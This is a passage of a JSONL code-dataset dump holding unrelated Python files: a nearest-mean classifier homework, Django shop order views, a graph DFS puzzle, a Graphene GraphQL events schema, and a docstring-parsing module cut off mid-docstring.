+{"seq_id":"464536771","text":"#question(a) synthetic1\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom scipy.spatial.distance import cdist\n\ntraining = np.loadtxt(open(\"synthetic1_train.csv\"), delimiter=\",\")\n\nlabel_train = training[:,2]\nX1mean=np.sum(training[label_train==1,0])/np.count_nonzero(label_train==1)\nY1mean=np.sum(training[label_train==1,1])/np.count_nonzero(label_train==1)\nprint('In synthetic1_train,class1 Xmean is ',(X1mean))\nprint('In synthetic1_train,class1 Ymean is ',(Y1mean))\nplt.scatter(training[label_train==1,0],training[label_train==1,1],marker=\"^\",label=\"class1\")\nplt.scatter(X1mean,Y1mean,marker=\"x\",label=\"class1 mean\")\n\n\nX2mean=np.sum(training[label_train==2,0])/np.count_nonzero(label_train==2)\nY2mean=np.sum(training[label_train==2,1])/np.count_nonzero(label_train==2)\nprint('In synthetic1_train,class2 Xmean is ',(X2mean))\nprint('In synthetic1_train,class2 Ymean is 
',(Y2mean))\nplt.scatter(training[label_train==2,0],training[label_train==2,1],marker=\"o\",c=\"r\",label=\"class2\")\nplt.scatter(X2mean,Y2mean,marker=(5, 2),c=\"g\",label=\"class2 mean\")\nplt.legend(loc='lower right')\nsample_mean=([X1mean,Y1mean],[X2mean,Y2mean])\nplt.show()\n\n\n#def plotDecBoundaries(training, label_train, sample_mean):\n\n\n\nnclass = max(np.unique(label_train))\n\n# Set the feature range for ploting\nmax_x = np.ceil(max(training[:, 0])) + 1\nmin_x = np.floor(min(training[:, 0])) - 1\nmax_y = np.ceil(max(training[:, 1])) + 1\nmin_y = np.floor(min(training[:, 1])) - 1\n\nxrange = (min_x, max_x)\nyrange = (min_y, max_y)\n\n# step size for how finely you want to visualize the decision boundary.\ninc = 0.005\n\n# generate grid coordinates. this will be the basis of the decision\n# boundary visualization.\n(x, y) = np.meshgrid(np.arange(xrange[0], xrange[1] + inc / 100, inc), np.arange(yrange[0], yrange[1] + inc / 100, inc))\n\n# size of the (x, y) image, which will also be the size of the\n# decision boundary image that is used as the plot background.\nimage_size = x.shape\nxy = np.hstack((x.reshape(x.shape[0] * x.shape[1], 1, order='F'),\n y.reshape(y.shape[0] * y.shape[1], 1, order='F'))) # make (x,y) pairs as a bunch of row vectors.\n\n# distance measure evaluations for each (x,y) pair.\ndist_mat = cdist(xy, sample_mean)\npred_label = np.argmin(dist_mat, axis=1)\n\n# reshape the idx (which contains the class label) into an image.\ndecisionmap = pred_label.reshape(image_size, order='F')\n\n# show the image, give each coordinate a color according to its class label\nplt.imshow(decisionmap, extent=[xrange[0], xrange[1], yrange[0], yrange[1]], origin='lower')\n\n# plot the class training data.\nplt.plot(training[label_train == 1, 0], training[label_train == 1, 1], 'rx')\nplt.plot(training[label_train == 2, 0], training[label_train == 2, 1], 'go')\nif nclass == 3:\n plt.plot(training[label_train == 3, 0], training[label_train == 3, 1], 'b*')\n\n# 
include legend for training data\nif nclass == 3:\n l = plt.legend(('Class 1', 'Class 2', 'Class 3'), loc=2)\nelse:\n l = plt.legend(('Class 1', 'Class 2'), loc=2)\nplt.gca().add_artist(l)\n\n# plot the class mean vector.\nm1, = plt.plot(sample_mean[0][0], sample_mean[0][1], 'rd', markersize=12, markerfacecolor='r', markeredgecolor='w')\nm2, = plt.plot(sample_mean[1][0], sample_mean[1][1], 'gd', markersize=12, markerfacecolor='g', markeredgecolor='w')\nif nclass == 3:\n m3, = plt.plot(sample_mean[2][0], sample_mean[2][1], 'bd', markersize=12, markerfacecolor='b', markeredgecolor='w')\n\n# include legend for class mean vector\nif nclass == 3:\n l1 = plt.legend([m1, m2, m3], ['Class 1 Mean', 'Class 2 Mean', 'Class 3 Mean'], loc=4)\nelse:\n l1 = plt.legend([m1, m2], ['Class 1 Mean', 'Class 2 Mean'], loc=4)\n\nplt.gca().add_artist(l1)\nplt.show()\n\n\n\n#############################training data\nclass1original=training[label_train==1,:]\nlistcountclass1=[]\nfor x in range(np.count_nonzero(label_train==1)):\n d1=math.sqrt((class1original[x,0]-X1mean)**2+(class1original[x,1]-Y1mean)**2)\n d2=math.sqrt((class1original[x,0]-X2mean)**2+(class1original[x,1]-Y2mean)**2)\n if d1<=d2:\n listcountclass1.insert(x,0)\n ##when we insert 0 means correct\n else:\n listcountclass1.insert(x,1)\n ##when we insert 1 means wrong\nclass1err=np.sum(listcountclass1) #how many errors in class1\n\n\nclass2original=training[label_train==2,:]\nlistcountclass2=[]\nfor x in range(np.count_nonzero(label_train==1)):\n d1=math.sqrt((class2original[x,0]-X1mean)**2+(class2original[x,1]-Y1mean)**2)\n d2=math.sqrt((class2original[x,0]-X2mean)**2+(class2original[x,1]-Y2mean)**2)\n if d1>=d2:\n listcountclass2.insert(x,0)\n ##when we insert 0 means correct\n else:\n listcountclass2.insert(x,1)\n ##when we insert 1 means wrong\n\nclass2err=np.sum(listcountclass2) #how many errors in class2\nerrorrate=(class1err+class2err)/(len(class1original)+len(class2original))\nprint('error rate of training data is 
:',(errorrate)) #The error rate of training data\n\n\n\n#############################testing data\ntesting = np.loadtxt(open(\"synthetic1_test.csv\"), delimiter=\",\")\nlabel_test=testing [:,2]\nclass1originaltest=testing[label_test==1,:]\nlistcountclass1test=[]\nfor x in range(np.count_nonzero(label_test==1)):\n d1test=math.sqrt((class1originaltest[x,0]-X1mean)**2+(class1originaltest[x,1]-Y1mean)**2)\n d2test=math.sqrt((class1originaltest[x,0]-X2mean)**2+(class1originaltest[x,1]-Y2mean)**2)\n if d1test<=d2test:\n listcountclass1test.insert(x,0)\n ##when we insert 0 means correct\n else:\n listcountclass1test.insert(x,1)\n ##when we insert 1 means wrong\nclass1errtest=np.sum(listcountclass1test) #how many errors in class1 in testing data\n\n\nclass2originaltest=testing[label_test==2,:]\nlistcountclass2test=[]\nfor x in range(np.count_nonzero(label_test==1)):\n d1test=math.sqrt((class2originaltest[x,0]-X1mean)**2+(class2originaltest[x,1]-Y1mean)**2)\n d2test=math.sqrt((class2originaltest[x,0]-X2mean)**2+(class2originaltest[x,1]-Y2mean)**2)\n if d1test>=d2test:\n listcountclass2test.insert(x,0)\n ##when we insert 0 means correct\n else:\n listcountclass2test.insert(x,1)\n ##when we insert 1 means wrong\n\nclass2errtest=np.sum(listcountclass2test) #how many errors in class2\nerrorratetest=(class1errtest+class2errtest)/(len(class1originaltest)+len(class2originaltest))\nprint('error rate of testing data is :',(errorratetest)) #The error rate of testing data\n\n\n\n\n\n\n\n\n","sub_path":"Week2 HW/synthetic1.py","file_name":"synthetic1.py","file_ext":"py","file_size_in_byte":6285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613030975","text":"from django.shortcuts import render, HttpResponseRedirect, redirect\nfrom django.db.models import Sum\nfrom .models import Product, Order, Customer, Delivery\nfrom datetime import datetime\nfrom django.http import Http404, JsonResponse\nfrom django.utils.datastructures 
import MultiValueDictKeyError\n\n# Create your views here.\ndef index(request):\n products = Product.objects.filter(sellNow=1)\n context = {'products': products, 'counts': range(1,11)}\n return render(request, 'mobileorder/ordermain.html', context)\n\n\ndef makeOrder(request):\n \"\"\"주문 들어오면 모델로 저장해주는 함��\"\"\"\n # 폼에서 들어오는 녀석들 일단 다 받기\n name = request.POST['customerName']\n tel = request.POST['tel']\n\n receiver = request.POST['customerName2']\n rec_tel = request.POST['tel2']\n email = request.POST['email']\n postcode = request.POST['sample2_postcode']\n address = request.POST['sample2_Address']\n detail = request.POST['detail_Address']\n order_pro = triming_pro(request.POST['products'].split(','))[:-1]\n order_vol = request.POST['volumes'].split(',')[:-1]\n orderNum = createOrderNum()\n # 해당 이메일 고유키로 현재 해당 고객 있는지 확인하고 객체 생성하기\n cus, created = Customer.objects.get_or_create(mail=email, defaults={'name': name, 'phone': tel,\n 'address': address,\n 'detail': detail, 'postcode': postcode})\n if created == False:\n addr_concent = address == cus.address\n if cus.name != name:\n pass\n else: addr_concent = True\n\n deli = Delivery.objects.create(userID=cus, orderNum=orderNum, moneyName=name)\n product_list = []\n total_cost = 0\n # 전체 상품 돌면서 주문 객체 만들어 집어넣어줌\n for pro, vol in zip(order_pro, order_vol):\n try:\n product = Product.objects.get(product=pro)\n except:\n print(\"상품을 찾지 못했습니다.\")\n\n vol = int(vol)\n if product.stocks < vol:\n message = product.product + \"- 해당 상품의 재고가 부족합니다.\"\n return Http404(message)\n order = Order.objects.create(userID=cus, deliverID=deli, orderNum=orderNum, product=product,\n orderVolume=vol, total=product.price*vol, sender=receiver,\n sendingAdr=address, sendingDetail=detail, senderTel=rec_tel)\n\n # 컨텍스트에 실어서 다시 주문확인 페이지 보내줄 녀석들 만드는 부분\n product_list.append(order)\n total_cost += product.price*vol\n\n context = {'orderNum':orderNum, 'customer':cus, 'goods':product_list, 'created': created,\n 'addr_concent': addr_concent, 
'total':total_cost}\n return render(request, 'mobileorder/payment.html', context=context)\n\n\ndef triming_pro(list):\n \"\"\"주문상품 form 들어오면 트리밍 해주는 함수\"\"\"\n new_list = []\n for i, pro in enumerate(list):\n proName = pro.split(':')[0]\n new_list.append(proName.strip())\n return new_list\n\n\ndef createOrderNum():\n \"\"\"주문번호 생성하는 함수\n 해당날짜 + 가장 최근 주문번호 다음으로 채번하는 형태임\"\"\"\n today = datetime.now()\n try:\n latest = Order.objects.latest('orderDate')\n if latest.orderDate.day + 1 == today.day:\n numbering = 1000\n else:\n numbering = int(latest.orderNum[-4:]) + 1\n except:\n numbering = 1000\n\n orderNum = today.strftime('%Y%m%d') + str(numbering)\n return orderNum\n\n\ndef showFinal(request):\n ordernum = request.POST['order_num']\n transfer = request.POST['transfer_name']\n # 입금자명 들어온 폼으로 업데이트\n # 현재 주문 총액 정보 order 모델에서 끌어와서 업데이트\n money_sum = Order.objects.filter(orderNum=ordernum).aggregate(Sum('total'))\n deli = Delivery.objects.get(orderNum=ordernum)\n deli.moneyName = transfer\n deli.moneySum = money_sum['total__sum']\n deli.save()\n # 주문지 최신화 체크박스 들어오는 경우 주소 업데이트\n try:\n check = request.POST['update_check']\n if check == 'yes':\n order = Order.objects.filter(orderNum=ordernum).first()\n cus = Customer.objects.get(pk=order.userID_id)\n cus.address = order.sendingAdr\n cus.detail = order.sendingDetail\n cus.save()\n except Order.DoesNotExist: print(\"오더에러\")\n except Customer.DoesNotExist: print(\"커스터머에러\")\n except MultiValueDictKeyError: pass\n\n return render(request, 'mobileorder/complete.html')\n\n\ndef orderFind(request):\n return render(request, 'mobileorder/orderfind.html')\n\n\ndef orderRedirect(request):\n\n try:\n mail = request.POST['mail']\n except MultiValueDictKeyError:\n return redirect('main')\n\n try:\n cus = Customer.objects.get(mail=mail)\n except Customer.DoesNotExist:\n raise Http404(\"해당 메일의 고객 정보가 없습니다!\")\n\n return HttpResponseRedirect('/orderdetail/%d/' % cus.pk)\n\n\ndef orderDetail(request, cusID):\n try:\n cus = 
Customer.objects.get(pk=cusID)\n except Customer.DoesNotExist:\n raise Http404(\"해당 메일의 고객 정보가 없습니다!\")\n deli = Delivery.objects.filter(userID_id=cus).values()\n order_nums = []\n for i in deli:\n order_nums.append(i)\n\n context = {'customer': cus, 'deliveries': deli}\n\n return render(request, 'mobileorder/orderdetail.html', context=context)\n\ndef ordersGet(request, orderNum):\n orders = Order.objects.filter(orderNum=orderNum)\n first = orders.first()\n total = 0\n for o in orders:\n total += o.total\n\n return render(request, 'mobileorder/orderNumget.html', {'orders':orders, 'first': first, 'total':total})\n\n\ndef stockFetch(request):\n product = request.GET.get('product',)\n response = {\n 'stock': Product.objects.get(product=product).stocks\n }\n return JsonResponse(response)\n\n","sub_path":"mobileorder/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"100161673","text":"from collections import defaultdict\n\n\ndef dfs(index, flag=0):\n global cost, clib, cpath, adj, color\n if flag==1:cost += clib\n else:\n cost += cpath\n color[index] = 1\n for i in range(len(adj[index])):\n vertex = adj[index][i]\n if not color[vertex]:dfs(vertex)\n return None\n\nfor _ in range(int(input())):\n color = [0] * 100010\n cost = 0\n n, m, clib, cpath = [int(x) for x in input().split()]\n adj = defaultdict(list)\n for i in range(m):\n u, v = [int(x) for x in input().split()]\n adj[u].append(v)\n adj[v].append(u)\n if clib < cpath:\n print(n * clib)\n else:\n for i in range(1, n+1):\n if color[i] == 0:\n dfs(i, 1)\n print(cost)\n\n","sub_path":"Hackerrank/road_and_libs.py","file_name":"road_and_libs.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"130570805","text":"from PIL import Image\nimport numpy as np\n\ndiff = [10, 50]\n\nbase = np.zeros((1080, 
960, 3), dtype=np.uint8)\nbase += 128\n\nleft0 = base.copy()\nleft0 -= diff[0]\nImage.fromarray(left0).save('../display/data/left0.png')\nleft1 = base.copy()\nleft1 += diff[0]\nImage.fromarray(left1).save('../display/data/left1.png')\n\nright0 = base.copy()\nright0 -= diff[1]\nImage.fromarray(right0).save('../display/data/right0.png')\nright1 = base.copy()\nright1 += diff[1]\nImage.fromarray(right1).save('../display/data/right1.png')\n\n","sub_path":"ImageProcessing/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"641208206","text":"import numpy as np\n\n\nclass MonsterHunter:\n def __init__(self, min_monster_num=1, max_monster_num=1e3, min_focus_damage=2, max_focus_damage=1e1, min_aoe_damage=1, min_hp=1, max_hp=1e3):\n self.min_monster_num = min_monster_num\n self.max_monster_num = max_monster_num\n self.min_focus_damage = min_focus_damage\n self.max_focus_damage = max_focus_damage\n self.min_aoe_damage = min_aoe_damage\n self.min_hp = min_hp\n self.max_hp = max_hp\n self.monster_num = None\n self.focus_damage = None\n self.aoe_damage = None\n self.monster_hps = None\n \n @property\n def parameters(self):\n parameters = {\"monster_num\": [self.monster_num],\n \"focus_damage\": [self.focus_damage],\n \"aoe_damage\": [self.aoe_damage],\n \"monster_hps\": [self.monster_hps]}\n \n return parameters\n\n def reset(self):\n \"\"\" Initial environment parameters. 
\"\"\"\n self.monster_num = np.random.randint(self.min_monster_num, self.max_monster_num)\n self.focus_damage = np.random.randint(self.min_focus_damage, self.max_focus_damage)\n self.aoe_damage = np.random.randint(self.min_aoe_damage, self.focus_damage)\n self.monster_hps = np.random.randint(self.min_hp, self.max_hp, size=(self.monster_num, ))\n\n def action(self, attack_num):\n \"\"\"\n This method check whether with the given attack number will all the monsters die.\n Return: True if all monsters die.\n False otherwise.\n \"\"\"\n if attack_num < 0:\n attack_num = 0\n\n # Fetch monster hps\n t_monster_hps = self.monster_hps.copy()\n\n # Calculate aoe attack all\n aoe_damage_all = self.aoe_damage * attack_num\n\n # Attack all monster with aoe damage\n for i in range(len(t_monster_hps)):\n if aoe_damage_all > t_monster_hps[i]:\n t_monster_hps[i] = 0\n else:\n t_monster_hps[i] -= aoe_damage_all\n\n # Calculate how many focus attack needed to kill all remain monster\n focus_attack_num = 0\n damage = self.focus_damage - self.aoe_damage\n for i in range(len(t_monster_hps)):\n if t_monster_hps[i] > 0:\n if t_monster_hps[i] % damage == 0:\n focus_attack_num += t_monster_hps[i] // damage\n else:\n focus_attack_num += t_monster_hps[i] // damage + 1\n\n # Return\n if focus_attack_num <= attack_num:\n return True\n else:\n return False\n","sub_path":"environments/monster_hunter/MonsterHunter.py","file_name":"MonsterHunter.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"549919999","text":"## Creates course assessment files for CAC purposes\n# Peter Ryan Nov 2018\n\nimport pandas as pd\nimport openpyxl\nfrom openpyxl.styles import Alignment\nfrom tabulate import tabulate\n\nimport sys\nimport re\nsys.path.append('c:\\\\Peter\\\\GitHub\\\\CoB\\\\')\n\n\ndef get_school_name(school_code):\n if school_code == '610P':\n return 'CBO'\n if school_code == '615H':\n return 'ACCT'\n if 
school_code == '620H':\n return 'BITL'\n if school_code == '625H':\n return 'EFM'\n if school_code == '630H':\n return 'MGT'\n if school_code == '650T':\n return 'VBE'\n if school_code == '660H':\n return 'GSBL'\n if school_code == 'VN':\n return 'SBM'\n return None\n\n\ndef cleanhtml(raw_html):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, '', raw_html)\n return cleantext\n\ndef get_PLOs(text, prog=None):\n try:\n if 'BP141' in prog:\n print(text)\n text = cleanhtml(text)\n print(text)\n PLOs = (text.split('\\n'))\n PLOs_2 = []\n for lo in PLOs:\n lo = lo.strip()\n lo = lo.rstrip()\n lo = lo.strip('-')\n lo = lo.strip('•')\n lo = lo.strip('*')\n lo = lo.strip('1')\n lo = lo.strip('2')\n lo = lo.strip('3')\n lo = lo.strip('4')\n lo = lo.strip('5')\n lo = lo.strip('6')\n lo = lo.strip('7')\n lo = lo.strip('8')\n lo = lo.strip('9')\n lo = lo.strip('.')\n if lo.startswith(\":\"):\n return lo[1:]\n lo = lo.strip(')')\n lo = lo.strip('\\uf0a7')\n lo = lo.strip()\n \n if len(lo) > 10:\n PLOs_2.append(lo)\n \n while PLOs_2[0][-1] != ':':\n PLOs_2 = PLOs_2[1:]\n PLOs_2 = PLOs_2[1:]\n return(PLOs_2)\n \n except Exception as e:\n print(e)\n print(prog)\n #print(text)\n return['']\n\n# open template\ndirectory = 'H:\\\\Projects\\\\CoB\\\\Program Transformation\\\\CLO mapping\\\\'\nclo_filename = 'PLOs_cob_unedited.xlsx'\ntemplate = 'PLO_template.xlsx'\nsavefile = 'PLO_cob.xlsx'\n\n\n# open template\nwb = openpyxl.load_workbook(directory+template)\n\n# fill CLOs worksheet\nplo_df = pd.read_excel(open(directory+clo_filename, 'rb'))\nplo_ws = wb.active\n\nj = 2\nfor i, r in plo_df.iterrows():\n if r['Status'] in ['Republished', 'Published']:\n school_code = r['Owning School'].split('(')[1][:-1]\n PLO_list = get_PLOs(r['Statement of Capabilities'], '{} {}'.format(r['Program Code'], r['Plan Code']))\n k = 1\n for plo in PLO_list:\n plo_ws.cell(row=j, column=1).value = r['Program Code']\n plo_ws.cell(row=j, column=2).value = r['Plan Code']\n plo_ws.cell(row=j, 
column=3).value = r['Program Name']\n plo_ws.cell(row=j, column=4).value = r['Career']\n plo_ws.cell(row=j, column=5).value = school_code\n plo_ws.cell(row=j, column=6).value = get_school_name(school_code)\n plo_ws.cell(row=j, column=7).value = 'PLO{}'.format(k)\n plo_ws.cell(row=j, column=8).alignment = Alignment(wrapText=True)\n plo_ws.cell(row=j, column=8).value = plo\n plo_ws.cell(row=j, column=9).value = r['Status']\n plo_ws.cell(row=j, column=10).value = r['Created Date']\n j += 1\n k += 1\nwb.save(directory+savefile)\n\n\n\n","sub_path":"PLO alignment/PLO_separation.py","file_name":"PLO_separation.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"250419414","text":"class Person(object):\r\n def __init__(self,name,age,position):\r\n self.Name = name\r\n self.Age = age\r\n self.Position = position\r\n\r\n def show_info(self):\r\n print(\"이름 : {}\".format(self.Name))\r\n print(\"나이 : {}\".format(self.Age))\r\n print(\"직위 : {}\".format(self.Position))\r\n print(\"저는 한국성서대학교 연구소 {0} {1} 입니다. 
나이는 {2} 입니다.\".format(self.Position,self.Name,self.Age))\r\nclass Researcher(Person):\r\n def __init__(self,name,age,position,degree):\r\n Person.__init__(self,name,age,position)\r\n self.Degree = degree\r\n def show_info(self):\r\n Person.show_info(self)\r\n print(\"저는 {} 입니다.\".format(self.Degree))\r\n\r\nif __name__ == '__main__':\r\n researcher_john = Researcher(\"John\", \"22\", \"연구원\", \"학사\")\r\n researcher_Tedd = Researcher(\"Tedd\", \"40\", \"소장\", \"박사\")\r\n researcher_john.show_info()\r\n print(\"=\"*50)\r\n researcher_Tedd.show_info()\r\n","sub_path":"2019년_1학기_기말고사/시험공부/파이썬 10단원 연습문제 예제_5.py","file_name":"파이썬 10단�� 연습문제 예제_5.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"426991951","text":"import graphene\nfrom graphene_sqlalchemy import SQLAlchemyObjectType\nfrom graphql import GraphQLError\n\nfrom api.events.models import Events as EventsModel\nfrom api.room.models import Room as RoomModel\nfrom helpers.calendar.events import RoomSchedules, CalendarEvents\n\n\nclass Events(SQLAlchemyObjectType):\n \"\"\"\n Returns the events payload\n \"\"\"\n class Meta:\n model = EventsModel\n\n\nclass EventCheckin(graphene.Mutation):\n \"\"\"\n Returns the eventcheckin payload\n \"\"\"\n class Arguments:\n calendar_id = graphene.String(required=True)\n event_id = graphene.String(required=True)\n event_title = graphene.String(required=True)\n start_time = graphene.String(required=True)\n end_time = graphene.String(required=True)\n number_of_participants = graphene.Int(required=True)\n check_in_time = graphene.String(required=False)\n event = graphene.Field(Events)\n\n def mutate(self, info, **kwargs):\n room_id, event = check_event_in_db(self, info, \"checked_in\", **kwargs)\n if not event:\n event = EventsModel(\n event_id=kwargs['event_id'],\n room_id=room_id,\n event_title=kwargs['event_title'],\n start_time=kwargs['start_time'],\n 
end_time=kwargs['end_time'],\n number_of_participants=kwargs['number_of_participants'],\n checked_in=True,\n cancelled=False)\n event.save()\n return EventCheckin(event=event)\n\n\nclass CancelEvent(graphene.Mutation):\n \"\"\"\n Returns the payload on event cancelation\n \"\"\"\n class Arguments:\n calendar_id = graphene.String(required=True)\n event_id = graphene.String(required=True)\n event_title = graphene.String(required=True)\n start_time = graphene.String(required=True)\n end_time = graphene.String(required=True)\n number_of_participants = graphene.Int()\n event = graphene.Field(Events)\n\n def mutate(self, info, **kwargs):\n # mutation to create an event\n room_id, event = check_event_in_db(self, info, \"cancelled\", **kwargs)\n if not event:\n event = EventsModel(\n event_id=kwargs['event_id'],\n room_id=room_id,\n event_title=kwargs['event_title'],\n start_time=kwargs['start_time'],\n end_time=kwargs['end_time'],\n number_of_participants=kwargs['number_of_participants'],\n checked_in=False,\n cancelled=True)\n event.save()\n\n return CancelEvent(event=event)\n\n\nclass EndEvent(graphene.Mutation):\n \"\"\"\n Mutation to end an event\n Returns event payload on ending the event\n \"\"\"\n class Arguments:\n calendar_id = graphene.String(required=True)\n event_id = graphene.String(required=True)\n start_time = graphene.String(required=True)\n end_time = graphene.String(required=True)\n meeting_end_time = graphene.String(required=True)\n event = graphene.Field(Events)\n\n def mutate(self, info, **kwargs):\n room_id, event = check_event_in_db(self, info, \"ended\", **kwargs)\n if not event:\n event = EventsModel(\n event_id=kwargs['event_id'],\n meeting_end_time=kwargs['meeting_end_time']\n )\n event.save()\n\n return EndEvent(event=event)\n\n\nclass SyncEventData(graphene.Mutation):\n \"\"\"\n Mutation to sync the event data in the db\n with the one on google calendar\n \"\"\"\n message = graphene.String()\n\n def mutate(self, info):\n 
CalendarEvents().sync_all_events()\n return SyncEventData(message=\"success\")\n\n\nclass MrmNotification(graphene.Mutation):\n \"\"\"\n Mutation to receive notification from MRM_PUSH\n service\n \"\"\"\n message = graphene.String()\n\n class Arguments:\n calendar_id = graphene.String()\n\n def mutate(self, info, calendar_id):\n room = RoomModel.query.filter_by(calendar_id=calendar_id).first()\n CalendarEvents().sync_single_room_events(room)\n return MrmNotification(message=\"success\")\n\n\ndef check_event_in_db(instance, info, event_check, **kwargs):\n room_id = RoomSchedules().check_event_status(info, **kwargs)\n event = EventsModel.query.filter_by(\n start_time=kwargs['start_time'],\n event_id=kwargs['event_id']).scalar()\n if event and event_check == 'cancelled':\n event.cancelled = True\n event.save()\n return room_id, event\n elif event and event_check == 'checked_in':\n event.checked_in = True\n if 'check_in_time' in kwargs:\n event.check_in_time = kwargs['check_in_time']\n else:\n event.check_in_time = None\n event.save()\n return room_id, event\n elif event and event_check == 'ended':\n if event.meeting_end_time:\n raise GraphQLError(\"Event has already ended\")\n event.meeting_end_time = kwargs['meeting_end_time']\n event.save()\n return room_id, event\n return room_id, event\n\n\nclass Mutation(graphene.ObjectType):\n event_checkin = EventCheckin.Field()\n cancel_event = CancelEvent.Field()\n end_event = EndEvent.Field(\n description=\"Mutation to end a calendar event given the arguments\\\n \\n- calendar_id: The unique identifier of the calendar event\\\n [required]\\n- event_id: The unique identifier of the target\\\n calendar event[required]\\\n \\n- event_id: The unique identifier of the calendar event[required]\\\n \\n- start_time: The start time of the calendar event[required]\\\n \\n- end_time: The field with the end time of the calendar event\\\n [required]\\\n \\n- meeting_end_time: The time the calendar event ended[required]\")\n 
sync_event_data = SyncEventData.Field()\n mrm_notification = MrmNotification.Field()\n event_checkin = EventCheckin.Field(\n description=\"Mutation to check in to a calendar event given the arguments\\\n \\n- calendar_id: The unique identifier of the calendar event\\\n [required]\\n- event_id: The unique identifier of the target\\\n calendar event[required]\\\n \\n- event_title: The title field of the calendar event[required]\\\n \\n- start_time: The start time of the calendar event[required]\\\n \\n- end_time: The field with the end time of the calendar event\\\n [required]\")\n cancel_event = CancelEvent.Field(\n description=\"Mutation to cancel a claendar event given the arguments\\\n \\n- calendar_id: The unique identifier of the calendar event\\\n [required]\\n- event_id: The unique identifier of the target \\\n calendar event\\\n [required]\\n- event_title: The title field of the calendar event\\\n [required]\\n- start_time: The start time of the calendar event\\\n [required]\\n- end_time: The field with the end time of the calendar\\\n event[required]\")\n","sub_path":"api/events/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":7079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"561909855","text":"\"\"\"\nModule for splitting docstring into `Section` groups.\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nfrom typing import Text, List, Generator\n\nfrom fhdoc.utils.indent_trimmer import IndentTrimmer\n\n\nclass SectionBlock:\n\t\"\"\"\n\tDataclass representing a `Section` block.\n\n\tArguments:\n\t\tlines -- List of lines.\n\t\"\"\"\n\n\tdef __init__(self, lines):\n\t\t# type: (List[Text]) -> None\n\t\tself.lines = lines\n\n\tdef render(self):\n\t\t# type: () -> Text\n\t\t\"\"\"\n\t\tRender trimmed block lines.\n\n\t\tReturns:\n\t\t\tBlock lines as a text.\n\t\t\"\"\"\n\t\tlines = IndentTrimmer.trim_lines(self.lines)\n\t\treturn \"\\n\".join(lines)\n\n\nclass 
Section:\n\t\"\"\"\n\tDataclass representing a section in a `SectionMap`.\n\n\tArguments:\n\t\ttitle -- Section title.\n\t\tblocks -- List of line blocks.\n\t\"\"\"\n\n\tdef __init__(self, title, blocks):\n\t\t# type: (Text, List[SectionBlock]) -> None\n\t\tself.title = title\n\t\tself.blocks = blocks\n\n\tdef render(self):\n\t\t# type: () -> Text\n\t\t\"\"\"\n\t\tRender all Section block lines.\n\n\t\tReturns:\n\t\t\tSection lines as a text.\n\t\t\"\"\"\n\t\tresult = []\n\t\tfor block in self.blocks:\n\t\t\tresult.append(block.render())\n\n\t\treturn \"\\n\\n\".join(result)\n\n\nclass SectionMap(dict):\n\t\"\"\"\n\tDict-based storage for parsed `Section` list for\n\t`fhdoc.processors.base.BaseDocstringProcessor`\n\n\tKey is a `Section` title.\n\tValue is a related `Section` instance.\n\t\"\"\"\n\n\tdef __init__(self):\n\t\t# type: () -> None\n\t\tsuper(SectionMap, self).__init__()\n\t\tself._order = [] # type: List[Text]\n\n\tdef add_line_indent(self, section_name, line):\n\t\t# type: (Text, Text) -> None\n\t\t\"\"\"\n\t\tAdd line respecting indent of the current section block.\n\n\t\tArguments:\n\t\t\tsection_name -- Target section title\n\t\t\tline -- Line to add\n\t\t\"\"\"\n\t\tif section_name in self:\n\t\t\tsection = self[section_name]\n\t\t\tif section.blocks and section.blocks[-1].lines:\n\t\t\t\tindent = IndentTrimmer.get_line_indent(section.blocks[-1].lines[-1])\n\t\t\t\tline = IndentTrimmer.indent_line(line, indent)\n\n\t\tself.add_line(section_name, line)\n\n\tdef add_line(self, section_name, line):\n\t\t# type: (Text, Text) -> None\n\t\t\"\"\"\n\t\tAdd new `line` to the last `SectionBlock` of section `section_name`.\n\t\tIf line and section are empty - section is not created.\n\n\t\tArguments:\n\t\t\tsection_name -- Target section title\n\t\t\tline -- Line to add\n\t\t\"\"\"\n\t\tif section_name not in self:\n\t\t\tif not line:\n\t\t\t\treturn\n\n\t\t\tself._order.append(section_name)\n\t\t\tself[section_name] = Section(title=section_name, 
blocks=[])\n\n\t\tsection = self[section_name]\n\t\tif not section.blocks:\n\t\t\tsection.blocks.append(SectionBlock(lines=[]))\n\n\t\tself[section_name].blocks[-1].lines.append(line)\n\n\tdef add_block(self, section_name):\n\t\t# type: (Text) -> None\n\t\t\"\"\"\n\t\tAdd new `SectionBlock` to section `section_name`.\n\t\tIf `Section` does not exist - it is not created.\n\n\t\tArguments:\n\t\t\tsection_name -- Target section title\n\t\t\"\"\"\n\t\tif section_name not in self:\n\t\t\treturn\n\n\t\tself[section_name].blocks.append(SectionBlock(lines=[]))\n\n\tdef trim_block(self, section_name):\n\t\t# type: (Text) -> None\n\t\t\"\"\"\n\t\tDelete last empty lines from the last `SectionBlock`.\n\t\tIf `Section` does not exist - it is not created.\n\n\t\tArguments:\n\t\t\tsection_name -- Target section title.\n\t\t\"\"\"\n\t\tif section_name not in self:\n\t\t\treturn\n\n\t\tlines = self[section_name].blocks[-1].lines\n\t\twhile lines and not lines[-1].strip():\n\t\t\tlines.pop()\n\n\t@property\n\tdef sections(self):\n\t\t# type: () -> Generator[Section, None, None]\n\t\t\"\"\"\n\t\tIterate over existing `Section` objects.\n\n\t\tYields:\n\t\t\t`Section` objects in order of 